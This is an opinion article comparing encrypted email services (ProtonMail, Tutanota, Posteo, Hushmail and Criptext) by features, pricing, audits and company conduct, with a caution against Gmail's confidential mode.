Editor’s note: This article is the third in a series focusing on the best encrypted apps and services available. Content has been provided by an anonymous security and privacy professional. Readers are encouraged to verify this information on their own.

ProtonMail

ProtonMail was founded by CERN and MIT scientists after the Snowden leak. Their goal was to create an encrypted email service that is just as easy to use as an unencrypted one. ProtonMail is partly open source, with the browser-based JavaScript encryption being accessible simply by using a browser’s “view source” tool. It was originally audited by CERN’s computer security staff, and later by outside professionals donating their time, who also got access to the back-end code. ProtonMail has been attempting to become completely open source for a long time (unedited code would not be flattering), but resources are limited. However, they do maintain an open source library.

ProtonMail gives free accounts an address and 500mb of storage, with additional storage, alias addresses, and other features purchasable piecemeal or bundled. Paid users can also download emails to an IMAP and/or SMTP-supporting application, via the ProtonMail Bridge application. ProtonMail is based in Switzerland. (one of the perks of working at CERN, along with the lunchroom being a captive audience of top engineers. Though they once drew criticism for sharing metadata with law enforcement in a kidnapping case in which a court order was inevitable but had not yet been issued.) Timers for ephemeral emails are set in hourly increments, with the longest delay being four weeks, set using drop-down menus for weeks, days, and hours. Out of network encrypted email can only be ephemeral (that is, they become impossible to decrypt), defaulting to four weeks—I don’t know what’s the purpose, but it hasn’t caused any problems.

 

ProtonMail is HIPAA compliant, which doesn’t mean it has met a higher security bar than the others, but it’s good if you want or need to show due diligence for business purposes. Non-free features of ProtonMail can also be bundled with a non-free tier of ProtonVPN at a discount. (Note: If a VPN is free, rather than having a free tier, it’s spying on you—at best.) Subscriptions start at one user, 5GB of storage, 5 addresses, 1000 messages/day, and 200 folders/labels for 5 USD, euro, or CHF per month or 48 USD, euro, or CHF per year. For businesses with up to 50 email users, a ProtonMail “Professional” subscription can be purchased that has additional features. ProtonMail is popular among the privacy and security community (it’s used by some of the experts I link to at the bottom and Restore The Fourth, among others), because the company supports privacy-related causes, is slowly creating a suite of privacy tools, and was early to market. ProtonMail is also the only email provider in this review with ephemeral messaging, which isn’t a hugely important feature, but I think is good to have.

ProtonMail flaws (but not deal-breakers):

For most people, the biggest negative will be the price. If you’re a power user using multiple aliases and domains, a business or family with multiple users, or bundling the cost of email and a VPN, the price-structure may be advantageous over others. But ProtonMail isn’t very cost effective for someone who just needs more than 500mb of storage and IMAP/SMTP support, especially when he/she isn’t used to paying for email. Aliases are also permanent, so you can’t delete one to free up its slot—you must buy another if you hit the limit of your plan. Some may opt for another provider, due to the lack of an integrated calendar. A calendar has long been planned but has yet to arrive (I’m not holding my breath). ProtonMail is also a poor choice for creating throwaway accounts, as they use SMS verification to reduce the number of spam accounts.
As mentioned above, ProtonMail now can add outside public keys to contacts. This worked three out of four times. Support—whom I have always found pleasant—told me that the fourth time, I had used an expired key, though the contacts manager showed it as current. I’m considering the bug a minor nuisance—for now.

 

The Competition to ProtonMail:

 

Tutanota

Tutanota—faux-Latin for secure message—is fully open source and completely independently audited. It’s also freemium, has apps, and is fairly popular. Again, this is the only email provider that encrypts subject lines. The free tier has a gigabyte of storage and the ability to search a month’s worth of email bodies (that is, they’re decrypted, so that your search isn’t limited to the metadata). But that’s it. It doesn’t even have filters, inbox rules, or any support. “Premium” and “Pro” tiers and the piecemeal “expansions” may or may not be more cost-effective than ProtonMail’s price for the same combination of features: if you’re a nonprofit organization, accounts are heavily discounted. One purchasable feature of Tutanota is an encrypted contact form. But for the price (24/month), consider using PGP—there are various HTML/PHP examples you can copy and paste or even a WordPress plugin.

As for the search function, I’ve always found an email by a recipient and/or subject when searching my ProtonMail account. I can think of times, however, I’ve needed to do that in the past, so I could see some favoring Tutanota for this reason. I’m underwhelmed with the search feature, though. They use an indexing process that needs to be repeated for your every first search in a session (and you can’t choose to only search sender/recipient and subject line), which could potentially be very inefficient time and data-wise. Moreover, the search misses some emails, and because it’s an indexing system, you can only search for full words. Tutanota says they will use an API to add interoperability, but they aren’t clear on how that would work.

I use Tutanota for throwaway accounts. If you trip their spam detection algorithm, they simply put a 48-hour hold on the account.

Tutanota flaws (but not deal-breakers):

One thing people can find annoying about Tutanota is that password protected emails don’t have a hint for the password. Or the lack of IMAP and calendar.  Another downside may be their corporate culture. Compare this Tutanota blog post with this ProtonMail blog post. I don’t care to speculate if this reflects any problems Tutanota has with professionalism, but I think it’s fair to highlight it when comparing services.

 

Posteo

Posteo costs just €1/month, is open source and audited, and has most features you would want, including an encrypted calendar and notes—they’re even environmentally conscious. As mentioned above, Posteo also allows non-users to add their PGP public keys to their directory, partially fixing the interoperability problem. To you who find Posteo appealing for its calendar functions, note that shared calendars are visible to anyone with their URL.

Why Posteo doesn’t really qualify for this list, and why you probably won’t use it:

The first problem you’ll find with Posteo is that doesn’t have any free tier. At €1/month and monthly terms for the most basic account (which is very generously featured), Posteo is no great expense. It makes it, however, that much harder to get your friends to join. As for a free trial, there is a 14 day grace period to add credit, but there are major restrictions on your account during this period. This is probably why you can get so many features for €1/month.

The secondproblem is that Posteo doesn’t have their own mobile apps, so they technically don’t meet my requirements, one of which was that an encrypted service should be as fully featured and easy to use as an unencrypted app/service. The third issue is a possible professionalism problem—again, with regard to how they respond to criticism. But I can’t read German, so I can’t go into detail on that.

As for the actual encryption, most of Posteo’s encryption tools are off by default, as well, and the email encryption is done with a browser or email client extension, which is what we’re trying to avoid. Posteo has their own key database and a relatively seamless interface with a PGP browser extension. But the encryption isn’t actually part of Posteo, meaning that even intranetwork emails aren’t automatically encrypted. And if you need to read this to know how and why to use encrypted communication, creating a Posteo account probably won’t be what gets you into gear.

If all you care about is your own email provider respecting your privacy (and don’t mind stock mobile apps), Posteo is a great choice. However, I don’t recommend it for encrypted email, unless you’re already using your own encryption tools and just need a better email provider for transit. The same goes for Mailbox.org and Cock.li—yes, that’s a real email provider.

 

Hushmail

Hushmail, the oldest encrypted email provider, is similar to ProtonMail, both in interface and technology (OpenPGP) but somewhat infamous for having decrypted email at a court’s request. Pricing is also similar. It’s also HIPAA compliant and offers secure forms for business, albeit at $120/year. The big differences for individuals are that Hushmail offers unlimited aliases, albeit in a different format that a some might not like, and their key management system for interoperability is overly complicated with poor instructions. I’m not convinced by Hushmail’s bargain for individuals. If you’re a business, on the other hand, Hushmail may be the best option: ProtonMail and Tutanota have business tools, but their raison d’etre is post-Snowden privacy for the common man, while Hushmail seems to have been created as a business tool.

Why I didn’t put Hushmail up with ProtonMail for individuals:

Because they don’t decrypt emails, the lack of an Android app, and their privacy policy. (Compare with ProtonMail’s.)

 

Criptext

Criptext is still in beta, but it’s an interesting service. It’s open source, based on the Signal Protocol, and currently free. With the Signal Protocol, everything happens on your device, the emails are even stored there, rather than on central servers. Additionally, rather than having a single password for everything you’ve ever been sent, a new password is used for each message (this is called “forward secrecy”). That’s the most secure way of doing things, as well as being the most scalable, being non-reliant on a central server system capable of holding everything.

Instead of intranetwork ephemeral emails, they have an “unsend” feature, which can be activated at any time. I prefer this, as you could “unsend” a conversation all at once and whenever the information actually should be irretrievable, rather than have to remember to set a timer for each email and risk setting it too short. Although ephemeral messaging isn’t necessary for most, it’s a good option to have. The drawback is that recipients would find it rude. For out-of-network emails, they’re all ephemeral, like ProtonMail, but become unreadable after just 10 days, which seems too short. (It’s presumably because they need server space for those emails. I would expect longer options being added if/when they go freemium.) Like Tutanota, there’s also no password hint.

Criptext flaws (but not deal-breakers):

Criptext is quite new to say much about it. Interoperability is essentially out unless there’s a radical redesign. It’s app only (iOS, Android, and Mac OS, with Windows and Linux planned), which could be a major issue for some. (Though, if you use a password manager, such as KeePass and its derivatives, you probably aren’t logging into email on other people’s devices, anyway.) There’s also no contacts manager, just autocomplete suggestions, which means you’d have to use your device’s native, unencrypted contacts manager for all other information, which is cumbersome and potentially defeats the purpose of an encrypted email app. I wouldn’t recommend it in its current stage, and probably never, but I could easily see this serving niche purposes.

I quickly came to dislike the company. Their “Medium” article “It’s Time To Drop PGP” is extremely misleading. “EFAIL” is a long-known and narrow weakness in some OpenPGP-based apps, not OpenPGP itself. And while I usually have high praise for the EFF, there seems to be a consensus that they overreacted (and they haven’t taken their own staff members’ public keys down…), so citing them while cautioning against competitors (they name ProtonMail, which is not affected by EFAIL, and the EFF has never recommended ProtonMail or any other proprietary software) comes across as disingenuous.

We Need A New Encrypted Email Service” is a rant specifically about ProtonMail, and doesn’t strike me as very fair, either. The jurisdiction thing isn’t wrong, as noted above, but it’s a poor criticism. “Secure Email Based in Switzerland” is just a tagline, and the real reason ProtonMail is based in Switzerland is the same reason it’s called ProtonMail: Many of the founders, including CEO Dr. Andy Yen, are from CERN.  As for confidence, trust in a VPN and trust in an email service are very different—VPNs know your IP address and you can never be sure they aren’t keeping logs (though if they’ve recently been subpoenaed and didn’t hand anything over, that’s a good sign) while email services can be audited. And while Criptext is correct to say, “We don’t trust, we verify,” ProtonMail’s security has been verified, as has OpenPGP’s, itself. Thus, having established trust in ProtonMail, it would follow that we can trust ProtonVPN.

The grain of truth is that, also noted above, you need to trust a browser-based encryption provider to serve you the audited code, rather than a malicious code. However, Criptext, being new, has not been audited at all—people are just trusting that they use the Signal Protocol and not creating a massive database of plaintext emails, never mind innocent mistakes (cryptography is hard). And while anyone could hypothetically check the JavaScript ProtonMail serves against the repository, you can’t really do that with an iPhone app. So, in practice, we actually have to place a lot more trust in Criptext than in ProtonMail. As for key management, if there was a problem with key encryption on session logouts, I’d like to think it would have been spotted by one of the auditors. It could be that I’m a ProtonMail fan blinded by brand loyalty, of course, but these criticisms also just seem disingenuous. As evidence, Criptext should have the expertise necessary to do their own audit of ProtonMail—a complete audit would be a large undertaking, but not copying and pasting code they think is fundamentally flawed in a way identifiable from the FAQ; if the code really is flawed, why don’t they actually show us how?

My own rant over, this doesn’t mean that their product is bad, of course. But I’d like an explanation for all of this before I give them any money.

What you should NOT use under any circumstances:

Gmail’s “confidential” mode. It’s just a gimmick—our emails are still stored in plaintext on their servers. Plus, data-mining and evilness, among others. Google’s security is generally thought to be pretty good, though.

With regard to the interfaces of each, ProtonMail can have Outlook-like columns or Gmail-like rows, Hushmail is also similar to Gmail, Tutanota is similar to Outlook, and Posteo is similar to Thunderbird, with Criptext being like every other smartphone email app.